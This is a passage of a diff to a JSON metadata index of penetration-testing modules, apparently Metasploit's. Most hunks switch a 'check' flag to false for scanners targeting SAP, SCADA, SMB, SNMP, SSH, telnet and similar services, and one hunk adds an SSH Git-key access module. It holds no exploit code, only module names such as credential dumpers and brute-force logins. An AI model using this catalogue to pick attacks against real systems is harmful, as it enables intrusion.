     "ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37349,7 +37831,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37396,7 +37878,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37444,7 +37926,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37491,7 +37973,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37538,7 +38020,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_startprofile",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37585,7 +38067,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37625,7 +38107,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_router_info_request",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37704,7 +38186,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_service_discovery",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37752,7 +38234,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_smb_relay",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37799,7 +38281,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_bapi_user_create1",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -37842,11 +38324,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_brute_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -37893,7 +38375,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -37940,7 +38422,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -37986,7 +38468,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_eps_get_directory_listing",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38035,7 +38517,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38082,7 +38564,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_ping",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38129,7 +38611,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_read_table",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38177,7 +38659,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_rzl_read_dir",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38224,7 +38706,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38271,7 +38753,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38318,7 +38800,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_sxpg_command_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38367,7 +38849,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_rfc_system_info",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38414,7 +38896,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_soap_th_saprel_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38456,11 +38938,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_web_gui_brute_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -38498,7 +38980,7 @@
     "path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/digi_addp_reboot",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38536,7 +39018,7 @@
     "path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/digi_addp_version",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -38574,7 +39056,7 @@
     "path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/digi_realport_serialport_scan",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -38612,7 +39094,7 @@
     "path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/digi_realport_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -38662,7 +39144,7 @@
     "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -38700,7 +39182,7 @@
     "path": "/modules/auxiliary/scanner/scada/koyo_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/koyo_login",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -38817,7 +39299,7 @@
     "path": "/modules/auxiliary/scanner/scada/modbusdetect.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/modbusdetect",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -38856,7 +39338,7 @@
     "path": "/modules/auxiliary/scanner/scada/moxa_discover.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/moxa_discover",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -38973,7 +39455,7 @@
     "path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/scada/sielco_winlog_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39010,7 +39492,7 @@
     "path": "/modules/auxiliary/scanner/sip/enumerator.rb",
     "is_install_path": true,
     "ref_name": "scanner/sip/enumerator",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39047,7 +39529,7 @@
     "path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb",
     "is_install_path": true,
     "ref_name": "scanner/sip/enumerator_tcp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39084,7 +39566,7 @@
     "path": "/modules/auxiliary/scanner/sip/options.rb",
     "is_install_path": true,
     "ref_name": "scanner/sip/options",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39121,7 +39603,7 @@
     "path": "/modules/auxiliary/scanner/sip/options_tcp.rb",
     "is_install_path": true,
     "ref_name": "scanner/sip/options_tcp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39200,7 +39682,7 @@
     "path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py",
     "is_install_path": true,
     "ref_name": "scanner/smb/impacket/dcomexec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -39252,7 +39734,7 @@
     "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
     "is_install_path": true,
     "ref_name": "scanner/smb/impacket/secretsdump",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -39293,7 +39775,7 @@
     "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
     "is_install_path": true,
     "ref_name": "scanner/smb/impacket/wmiexec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -39335,7 +39817,7 @@
     "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/pipe_auditor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39374,7 +39856,7 @@
     "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/pipe_dcerpc_auditor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39416,7 +39898,7 @@
     "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/psexec_loggedin_users",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39453,7 +39935,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb1.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb1",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39490,7 +39972,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb2.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb2",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39533,7 +40015,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enum_gpp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39576,7 +40058,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enumshares",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39615,7 +40097,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enumusers",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39655,7 +40137,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_enumusers_domain",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39697,7 +40179,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -39736,7 +40218,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_lookupsid",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39785,7 +40267,7 @@
     "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_ms17_010",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39869,11 +40351,11 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2018-05-07 00:13:11 +0000",
+    "mod_time": "2019-10-02 20:22:51 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39919,7 +40401,7 @@
     "path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/smtp/smtp_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -39962,7 +40444,7 @@
     "path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb",
     "is_install_path": true,
     "ref_name": "scanner/smtp/smtp_ntlm_domain",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40007,7 +40489,7 @@
     "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
     "is_install_path": true,
     "ref_name": "scanner/smtp/smtp_relay",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40050,7 +40532,7 @@
     "path": "/modules/auxiliary/scanner/smtp/smtp_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/smtp/smtp_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40088,7 +40570,7 @@
     "path": "/modules/auxiliary/scanner/snmp/aix_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/aix_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40126,7 +40608,7 @@
     "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/arris_dg950",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40163,7 +40645,7 @@
     "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/brocade_enumhash",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40201,7 +40683,7 @@
     "path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/cisco_config_tftp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40239,7 +40721,7 @@
     "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/cisco_upload_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40277,7 +40759,7 @@
     "path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/cnpilot_r_snmp_loot",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40316,7 +40798,7 @@
     "path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/epmp1000_snmp_loot",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40353,7 +40835,7 @@
     "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/netopia_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40392,7 +40874,7 @@
     "path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/sbg6580_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40431,7 +40913,7 @@
     "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40472,7 +40954,7 @@
     "path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_enum_hp_laserjet",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40509,7 +40991,7 @@
     "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_enumshares",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40546,7 +41028,7 @@
     "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_enumusers",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40583,7 +41065,7 @@
     "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -40622,7 +41104,7 @@
     "path": "/modules/auxiliary/scanner/snmp/snmp_set.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/snmp_set",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40659,7 +41141,7 @@
     "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/ubee_ddw3611",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40696,7 +41178,7 @@
     "path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/xerox_workcentre_enumusers",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40733,7 +41215,7 @@
     "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/apache_karaf_command_execution",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -40772,7 +41254,7 @@
     "path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/cerberus_sftp_enumusers",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40810,7 +41292,7 @@
     "path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/detect_kippo",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40850,7 +41332,7 @@
     "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/eaton_xpert_backdoor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40892,7 +41374,7 @@
     "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/fortinet_backdoor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40932,7 +41414,7 @@
     "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/juniper_backdoor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -40973,7 +41455,7 @@
     "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/karaf_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41012,7 +41494,44 @@
     "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/libssh_auth_bypass",
-    "check": true,
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/ssh/ssh_enum_git_keys": {
+    "name": "Test SSH Github Access",
+    "fullname": "auxiliary/scanner/ssh/ssh_enum_git_keys",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Wyatt Dahlenburg ( <Wyatt Dahlenburg (@wdahlenb)>"
+    ],
+    "description": "This module will attempt to test remote Git access using\n          (.ssh/id_* private keys). This works against GitHub and\n          GitLab by default, but can easily be extended to support\n          more server types.",
+    "references": [
+      "URL-https://help.github.com/en/articles/testing-your-ssh-connection"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-11-27 11:18:01 +0000",
+    "path": "/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ssh/ssh_enum_git_keys",
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41060,7 +41579,7 @@
     "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_enumusers",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41099,7 +41618,7 @@
     "path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_identify_pubkeys",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41136,7 +41655,7 @@
     "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41174,7 +41693,7 @@
     "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_login_pubkey",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41211,7 +41730,7 @@
     "path": "/modules/auxiliary/scanner/ssh/ssh_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41264,7 +41783,7 @@
     "path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py",
     "is_install_path": true,
     "ref_name": "scanner/ssl/bleichenbacher_oracle",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41311,7 +41830,7 @@
     "path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssl/openssl_ccs",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41407,7 +41926,7 @@
     "path": "/modules/auxiliary/scanner/steam/server_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/steam/server_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41444,7 +41963,7 @@
     "path": "/modules/auxiliary/scanner/telephony/wardial.rb",
     "is_install_path": true,
     "ref_name": "scanner/telephony/wardial",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41481,7 +42000,7 @@
     "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/brocade_enable_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41518,7 +42037,7 @@
     "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/lantronix_telnet_password",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41556,7 +42075,7 @@
     "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/lantronix_telnet_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41595,7 +42114,7 @@
     "path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/satel_cmd_exec",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41636,7 +42155,7 @@
     "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_encrypt_overflow",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41673,7 +42192,7 @@
     "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41713,7 +42232,7 @@
     "path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_ruggedcom",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -41750,7 +42269,7 @@
     "path": "/modules/auxiliary/scanner/telnet/telnet_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41788,7 +42307,7 @@
     "path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py",
     "is_install_path": true,
     "ref_name": "scanner/teradata/teradata_odbc_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -41834,7 +42353,7 @@
     "path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb",
     "is_install_path": true,
     "ref_name": "scanner/tftp/ipswitch_whatsupgold_tftp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41874,7 +42393,7 @@
     "path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb",
     "is_install_path": true,
     "ref_name": "scanner/tftp/netdecision_tftp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41911,7 +42430,7 @@
     "path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb",
     "is_install_path": true,
     "ref_name": "scanner/tftp/tftpbrute",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41950,7 +42469,7 @@
     "path": "/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.rb",
     "is_install_path": true,
